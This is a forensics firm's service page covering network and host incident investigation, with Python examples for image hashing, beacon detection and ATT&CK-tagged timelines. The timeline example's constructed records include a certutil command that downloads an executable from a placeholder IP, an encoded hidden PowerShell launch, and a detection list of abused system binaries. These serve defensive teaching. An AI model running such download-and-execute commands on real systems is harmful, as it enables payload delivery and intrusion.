WP Call: +91 8088734237
Email: info@sherlockedsecurity.com
Sherlocked Security – AI-Powered Cybersecurity & Penetration Testing
Digital Forensics & Incident Management

Network & Host Forensics

  • May 8, 2025

Sherlocked Security – Network & Host Forensics

Uncover Breach Indicators, Analyze Digital Artifacts, and Trace Intrusions Across Network and Endpoint Systems


1. Statement of Work (SOW)

Service Name: Network & Host Forensics
Client Type: Enterprises, Incident Response Teams, MSSPs, Law Enforcement, Regulatory Investigators
Service Model: Incident-Based and Historical Artifact Analysis
Compliance Coverage: NIST 800-61, ISO/IEC 27035, PCI-DSS, HIPAA, GDPR, DFARS

Engagement Types:

  • Post-Incident Host and Network Triage
  • Evidence Recovery from Logs, Memory, and Artifacts
  • Forensic Timeline and Lateral Movement Analysis
  • Malware Propagation and Persistence Detection
  • Data Exfiltration & C2 Channel Reconstruction

2. Our Approach

[Evidence Collection] → [Chain-of-Custody Documentation] → [Disk & Memory Imaging] → [Network Log & PCAP Analysis] → [Timeline Reconstruction] → [Malware or Exploit Traceback] → [IOC Mapping & Reporting]


3. Methodology

[Triage & Asset Scoping] → [Forensic Acquisition of Systems] → [Disk & Memory Parsing] → [Artifact & Log Correlation] → [PCAP/DNS/Flow Analysis] → [Malicious Behavior Attribution] → [Threat Mapping & Report Creation]


4. Deliverables to the Client

  1. Host and Network Forensics Analysis Report
  2. Timeline of Events: Access, Execution, Exploitation
  3. Extracted Indicators of Compromise (IOCs)
  4. Disk and Memory Artifact Listings
  5. Network Traffic (PCAP) Analysis Summary
  6. Registry, Prefetch, and Event Log Forensics
  7. MITRE ATT&CK and Kill Chain Mapping
  8. Screenshots and Evidence Snapshots
  9. Advisory for Containment and Remediation

5. What We Need from You (Client Requirements)

  • Incident description and known compromised assets
  • Access to endpoints (or disk/memory images)
  • Access to firewall, VPN, and network device logs
  • PCAP or full packet captures (if available)
  • Antivirus/EDR alerts and telemetry
  • Whitelisting for forensic tools (if needed)

6. Tools & Technology Stack

  • Disk Forensics: FTK Imager, Autopsy, Sleuth Kit, X-Ways
  • Memory Forensics: Volatility3, Rekall
  • Network Forensics: Wireshark, Zeek, Suricata, NetworkMiner
  • Timeline Analysis: log2timeline (Plaso), Timesketch
  • Artifact Analysis: KAPE, AmCache Parser, ShellBags Explorer
  • Threat Intel: MISP, VirusTotal, AbuseIPDB, MITRE ATT&CK
  • Log Sources: Sysmon, Windows Event Logs, syslog, NetFlow, firewall and VPN logs

7. Engagement Lifecycle

1. Incident Intake & Scope Definition → 2. Asset Forensic Imaging → 3. Memory, Disk, and Log Analysis → 4. Network Traffic and Flow Correlation → 5. Behavior Attribution → 6. IOC Extraction → 7. Remediation Advisory & Report Delivery


8. Why Sherlocked Security?

Feature | Sherlocked Advantage
Full-Scope Host & Network RE | Unified analysis of logs, memory, PCAPs, and disk for context-rich findings
Tool-Agnostic Analysis | Supports forensic imaging from major EDR and DFIR toolkits
Malware & Exploit Traceback | Detects payloads, shellcode, and exploit kits from traces
Threat Attribution | Maps TTPs to APT and crimeware groups via MITRE ATT&CK
Legal & Regulatory Alignment | Chain-of-custody compliant, suitable for legal evidence submission

9. Real-World Case Studies

Financial Sector: Credential Dumping and Lateral Movement

Incident: SOC detected suspicious remote desktop sessions across finance department hosts.
Findings: Credential harvesting via mimikatz; lateral movement using SMB/WinRM.
Outcome: Timeline of compromise created, GPO lockdown and password reset enforced enterprise-wide.

Manufacturing Firm: Suspected Data Exfiltration via VPN

Incident: Abnormal outbound VPN traffic at night hours flagged by SIEM.
Action: Extracted PCAP, correlated with system logs. Identified ZIP exfil via curl & PowerShell.
Outcome: VPN session and API keys disabled, insider threat case opened with legal support.


10. SOP – Standard Operating Procedure

  1. Incident Details Intake & Threat Scope
  2. Asset Identification (Endpoints, Servers, Logs, PCAPs)
  3. Secure Forensic Image Acquisition (Disk & Memory)
  4. Volatility-based RAM Analysis (Process Tree, DLLs, NetConns)
  5. Disk Artifact Recovery (MFT, ShellBags, LNK, AmCache, JumpLists)
  6. Log Timeline Creation (Sysmon, Security, Application)
  7. Network PCAP Analysis (Flows, DNS, TLS fingerprints, Payloads)
  8. IOC Extraction & Threat Intelligence Enrichment
  9. Correlate Events with MITRE ATT&CK & Kill Chain
  10. Reporting, Containment Guidance, and Closure

11. Network & Host Forensics Technical Checklist

1. Host-Based Evidence Acquisition

  • Create forensic images and record verified hashes (SHA-256 as the integrity hash; MD5 only as a secondary value for tools that still require it, since MD5 is collision-prone)
  • Acquire memory dumps using WinPMEM, DumpIt, LiME before any containment step that would clear volatile state
  • Record the BIOS/hardware clock offset against a trusted time source and the host time zone, so every timestamp can be normalised to UTC
  • Isolate compromised hosts from the network after acquisition (switch-port isolation or EDR network containment rather than powering off)
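The hash-and-verify step above, written out as an added example in Python (not Sherlocked's own tooling): the image is hashed in chunks so multi-gigabyte acquisitions need no RAM, a chain-of-custody record is written at acquisition time, and a copy is re-verified later. The image contents, case identifier, examiner and tool name are constructed placeholders; the flipped byte at the end simulates a corrupted transfer.

```python
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1024 * 1024  # hash 1 MiB at a time so large images never need to fit in memory


def hash_image(path):
    """Return (sha256, md5) hex digests of an image file.

    SHA-256 is the integrity hash. MD5 is recorded only because some
    tooling and older custody forms still expect it; it is not trusted alone.
    """
    sha256 = hashlib.sha256()
    md5 = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            sha256.update(chunk)
            md5.update(chunk)
    return sha256.hexdigest(), md5.hexdigest()


def custody_record(path, case_id, examiner, acquisition_tool):
    """Build the chain-of-custody entry captured at acquisition time (UTC)."""
    sha256, md5 = hash_image(path)
    return {
        "case_id": case_id,
        "evidence_file": os.path.basename(path),
        "size_bytes": os.path.getsize(path),
        "sha256": sha256,
        "md5": md5,
        "acquired_by": examiner,
        "tool": acquisition_tool,
        "acquired_utc": datetime.now(timezone.utc).isoformat(),
    }


def verify_image(path, record):
    """Re-hash the image and compare against the custody record.

    Returns (ok, detail). Any mismatch means this copy can no longer be tied
    to the original acquisition and must not be used for analysis.
    """
    sha256, md5 = hash_image(path)
    if sha256 != record["sha256"]:
        return False, "sha256 mismatch: expected %s got %s" % (record["sha256"], sha256)
    if md5 != record["md5"]:
        return False, "md5 mismatch (sha256 matched; custody record may have been edited)"
    return True, "verified"


def demo():
    # Constructed sample: a small fake image in a temp dir, not a real acquisition.
    tmp = tempfile.mkdtemp()
    image = os.path.join(tmp, "HOST01-disk.E01")
    with open(image, "wb") as f:
        f.write(b"NTFS    " + bytes(range(256)) * 16)
    rec = custody_record(image, "IR-2025-001", "examiner", "acquisition tool (placeholder)")
    ok_before, _ = verify_image(image, rec)
    # Simulate a single byte corrupted in transit, then re-verify the copy.
    with open(image, "r+b") as f:
        f.seek(100)
        f.write(b"\x00")
    ok_after, detail = verify_image(image, rec)
    return ok_before, ok_after, detail


if __name__ == "__main__":
    before, after, why = demo()
    print(json.dumps({"verified_at_acquisition": before, "verified_after_transfer": after, "detail": why}, indent=2))
```

Re-run verify_image on every copy that changes hands (examiner workstation, evidence share, counsel) and keep each result alongside the custody record; a failed SHA-256 check is the evidence that the copy, not the original, is what changed.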

2. Disk & File System Analysis

  • Parse:
    • $MFT (Master File Table)
    • $LogFile (NTFS journaling)
    • $UsnJrnl:$J (USN change journal)
  • Recover deleted files, LNK artifacts, and volume shadow copies
  • Extract Shellbags, RecentDocs, AmCache, and JumpLists
  • Analyze execution artifacts from Prefetch, SRUM, WMI, Task Scheduler

3. Memory Analysis

  • Use Volatility to:
    • Extract active processes, loaded DLLs, network connections
    • Identify code injection or process hollowing (e.g., svchost.exe not parented by services.exe, or executable memory regions with no backing file)
    • Detect credential dumping via suspicious handles to lsass.exe
    • Dump PE binaries from memory for reverse engineering

4. Log & Event Correlation

  • Collect:
    • Windows Event Logs (Security, System, App, PowerShell)
    • Sysmon Logs
    • VPN & Authentication Logs
  • Parse for:
    • Failed and successful logons (4625/4624, including logon type and source address), privilege use (4672), group membership changes (4728/4732)
    • Suspicious process launches (Sysmon Event ID 1: powershell, wscript, certutil, mshta, rundll32) and their parent process
    • Task creation (4698), service installation (4697/7045), and registry changes (Sysmon Event ID 13)

5. Network Forensics

  • Analyze PCAPs with:
    • Wireshark for payload extraction
    • Zeek for connection metadata and DNS queries
    • Suricata for IDS alerts and protocol anomalies
  • Extract:
    • TLS certificate fingerprints and client/server handshake fingerprints (JA3/JA3S)
    • C2 beaconing patterns
    • Suspicious domains and rare destination IPs
  • Reconstruct:
    • File transfers (HTTP/FTP)
    • Credential leakage (e.g., Basic Auth, NTLM)
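The "C2 beaconing patterns" item above, as an added example in Python that is not part of Sherlocked's toolset: the script reads Zeek conn.log rows, groups connections by (source, destination, port, protocol), and scores each group on the regularity of its inter-connection gaps and the uniformity of bytes sent. The conn.log content is constructed inline (one 60-second beacon with small jitter and one irregular browsing session); the thresholds are assumptions to tune per environment.

```python
import statistics
from collections import defaultdict

# Zeek conn.log columns used here, in the order Zeek writes them:
# ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes


def _conn_line(ts, uid, src, sport, dst, dport, obytes, rbytes):
    return "\t".join([f"{ts:.6f}", uid, src, str(sport), dst, str(dport),
                      "tcp", "ssl", "0.200000", str(obytes), str(rbytes)])


def build_sample_log():
    """Constructed conn.log: a 60 s beacon with +/-2 s jitter plus an irregular session."""
    base = 1746662400.0  # 2025-05-08 00:00:00 UTC
    lines = ["#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\torig_bytes\tresp_bytes"]
    t = base
    for i, gap in enumerate([0, 60, 61, 59, 60, 62, 58, 60, 61, 60, 59]):
        t += gap
        lines.append(_conn_line(t, f"Cb{i}", "10.20.1.55", 49000 + i, "203.0.113.10", 443, 312, 1180))
    t = base
    benign = zip([0, 5, 240, 12, 900, 33, 600, 7], [512, 2048, 300, 9100, 740, 1200, 3300, 450])
    for i, (gap, obytes) in enumerate(benign):
        t += gap
        lines.append(_conn_line(t, f"Cn{i}", "10.20.1.55", 50000 + i, "198.51.100.20", 443, obytes, 4000))
    return lines


def parse_conn(lines):
    """Group (timestamp, orig_bytes) samples by source/destination/port/proto."""
    flows = defaultdict(list)
    for line in lines:
        if line.startswith("#"):
            continue
        f = line.rstrip("\n").split("\t")
        obytes = int(f[9]) if f[9] != "-" else 0
        flows[(f[2], f[4], f[5], f[6])].append((float(f[0]), obytes))
    return flows


def beacon_score(samples, min_conns=8, max_jitter=0.15):
    """Score one flow group. jitter = stdev/mean of the gaps between connections;
    a scripted beacon sits near 0 even with sleep jitter, interactive traffic does not."""
    if len(samples) < min_conns:
        return None
    samples = sorted(samples)
    gaps = [b[0] - a[0] for a, b in zip(samples, samples[1:])]
    mean_gap = statistics.mean(gaps)
    if mean_gap <= 0:
        return None
    jitter = statistics.pstdev(gaps) / mean_gap
    sizes = [s[1] for s in samples]
    size_cv = statistics.pstdev(sizes) / statistics.mean(sizes) if statistics.mean(sizes) else 0.0
    return {"connections": len(samples), "mean_interval_s": round(mean_gap, 1),
            "jitter": round(jitter, 3), "size_cv": round(size_cv, 3), "beacon": jitter <= max_jitter}


def find_beacons(lines):
    """Return {flow_key: score} for every flow group with enough connections to judge."""
    results = {}
    for key, samples in parse_conn(lines).items():
        score = beacon_score(samples)
        if score is not None:
            results[key] = score
    return results


if __name__ == "__main__":
    for key, score in find_beacons(build_sample_log()).items():
        print(key, score)
```

Low jitter on its own is only a lead: NTP, monitoring agents and update checks also beacon. Pair the hit with the destination's reputation, the TLS fingerprint, and whether the connecting process on the host (from Sysmon Event ID 3) is one that should be talking to that address.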

6. Timeline and TTP Mapping

  • Use Plaso/log2timeline to build unified timeline
  • Cross-reference memory, logs, and network data
  • Identify:
    • Initial access vector (phishing, RDP, drive-by)
    • Privilege escalation events
    • Persistence and lateral movement
  • Map actions to MITRE ATT&CK (T1055, T1021, T1047, T1059.001, etc.; T1086 is the retired PowerShell ID, now T1059.001)
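The log-parsing checks in section 4 and the cross-source timeline and ATT&CK mapping in section 6 share one added example below, written in Python and not taken from Sherlocked or from Plaso. It normalises three constructed sources with three different clocks (Sysmon in UTC, a Security log exported in local time, Zeek in epoch seconds) into one UTC timeline, tags living-off-the-land launches, Office parents, RDP logons and scheduled tasks with technique IDs, and cross-references a network connection against the command line that caused it. The records, hostnames, addresses and the assumed local time zone are all constructed; the technique table is a starting point, not a complete mapping.

```python
from datetime import datetime, timedelta, timezone

# Constructed sample records for one hypothetical intrusion; nothing here is from a real case.
SYSMON_EVENTS = [
    "UtcTime: 2025-05-08 02:14:07.113 | EventID: 1 | Host: FIN-WS07 | Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | ParentImage: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE | CommandLine: powershell -nop -w hidden -enc SQBFAFgA",
    "UtcTime: 2025-05-08 02:14:09.540 | EventID: 1 | Host: FIN-WS07 | Image: C:\\Windows\\System32\\certutil.exe | ParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | CommandLine: certutil -urlcache -split -f http://203.0.113.10/a.txt a.exe",
    "UtcTime: 2025-05-08 02:20:31.002 | EventID: 1 | Host: FIN-WS07 | Image: C:\\Windows\\System32\\svchost.exe | ParentImage: C:\\Windows\\System32\\services.exe | CommandLine: svchost.exe -k netsvcs",
]
SECURITY_EVENTS = [  # (EventID, timestamp as exported in local time, host, selected fields)
    (4624, "2025-05-08 07:51:02", "FIN-SRV02", {"LogonType": "10", "TargetUserName": "svc_backup", "IpAddress": "10.20.1.55"}),
    (4698, "2025-05-08 07:52:40", "FIN-SRV02", {"TaskName": "\\Microsoft\\Windows\\Updater", "SubjectUserName": "svc_backup"}),
]
ZEEK_CONN = ["1746670452.300000\tCabc1\t10.20.1.55\t49812\t203.0.113.10\t443\ttcp"]

LOCAL_TZ = timezone(timedelta(hours=5, minutes=30))  # assumed: the exporting server ran on IST

# Living-off-the-land binaries and the ATT&CK technique their execution usually maps to.
LOLBINS = {
    "powershell.exe": "T1059.001", "wscript.exe": "T1059.005", "cscript.exe": "T1059.005",
    "certutil.exe": "T1105", "mshta.exe": "T1218.005", "rundll32.exe": "T1218.011",
    "regsvr32.exe": "T1218.010", "bitsadmin.exe": "T1197",
}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def parse_sysmon(line):
    fields = dict(part.split(": ", 1) for part in line.split(" | "))
    ts = datetime.strptime(fields["UtcTime"], "%Y-%m-%d %H:%M:%S.%f").replace(tzinfo=timezone.utc)
    image = fields["Image"].rsplit("\\", 1)[-1].lower()
    parent = fields["ParentImage"].rsplit("\\", 1)[-1].lower()
    techniques = []
    if image in LOLBINS:
        techniques.append(LOLBINS[image])
    if parent in OFFICE_APPS:  # Office spawning a script host: phishing attachment until proven otherwise
        techniques.append("T1566.001")
    if image == "svchost.exe" and parent != "services.exe":  # classic injection / masquerading tell
        techniques.append("T1055")
    return {"ts": ts, "host": fields["Host"], "source": "sysmon",
            "summary": f"{parent} -> {image}: {fields['CommandLine']}", "techniques": techniques}


def parse_security(eid, local_ts, host, fields):
    # Exported Security logs carry local time; convert to UTC before ordering anything.
    ts = datetime.strptime(local_ts, "%Y-%m-%d %H:%M:%S").replace(tzinfo=LOCAL_TZ).astimezone(timezone.utc)
    techniques = []
    if eid == 4624 and fields.get("LogonType") == "10":
        techniques.append("T1021.001")  # RDP logon
    elif eid == 4698:
        techniques.append("T1053.005")  # scheduled task created
    elif eid in (4697, 7045):
        techniques.append("T1543.003")  # service installed
    summary = f"EID {eid} " + " ".join(f"{k}={v}" for k, v in fields.items())
    return {"ts": ts, "host": host, "source": "security", "summary": summary, "techniques": techniques}


def parse_zeek_conn(line):
    ts, uid, src, sport, dst, dport, proto = line.split("\t")[:7]
    return {"ts": datetime.fromtimestamp(float(ts), tz=timezone.utc), "host": src, "source": "zeek",
            "dst": dst, "summary": f"{src}:{sport} -> {dst}:{dport}/{proto} uid={uid}", "techniques": []}


def build_timeline():
    events = [parse_sysmon(l) for l in SYSMON_EVENTS]
    events += [parse_security(*e) for e in SECURITY_EVENTS]
    events += [parse_zeek_conn(l) for l in ZEEK_CONN]
    # Cross-reference: a connection whose destination appears in a command line
    # within 60 s is the network-side evidence that the download actually happened.
    for net in (e for e in events if e["source"] == "zeek"):
        for proc in (e for e in events if e["source"] == "sysmon"):
            if net["dst"] in proc["summary"] and abs((net["ts"] - proc["ts"]).total_seconds()) <= 60:
                net["techniques"].append("T1105")
                net["summary"] += f" (matches {proc['host']} cmdline at {proc['ts'].strftime('%H:%M:%S')}Z)"
    return sorted(events, key=lambda e: e["ts"])


if __name__ == "__main__":
    for e in build_timeline():
        print(e["ts"].isoformat(), e["host"], e["source"], ",".join(e["techniques"]) or "-", e["summary"])
```

The ordering only holds because every timestamp was converted to UTC first; with the Security export left in local time the RDP logon would have appeared five and a half hours after the task it created. Record the time zone and clock offset of each source during acquisition (section 11.1) so this conversion is a fact, not a guess.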

7. Threat Intelligence & Reporting

  • Enrich IOCs via:
    • VirusTotal, MISP, AbuseIPDB, WHOIS lookups
    • MITRE CTI mappings and threat group identifiers
  • Provide:
    • IOC list (IPs, domains, hashes, mutexes, registry keys)
    • Risk and impact summary
    • Containment and remediation playbook
    • PDF and structured IOC JSON exports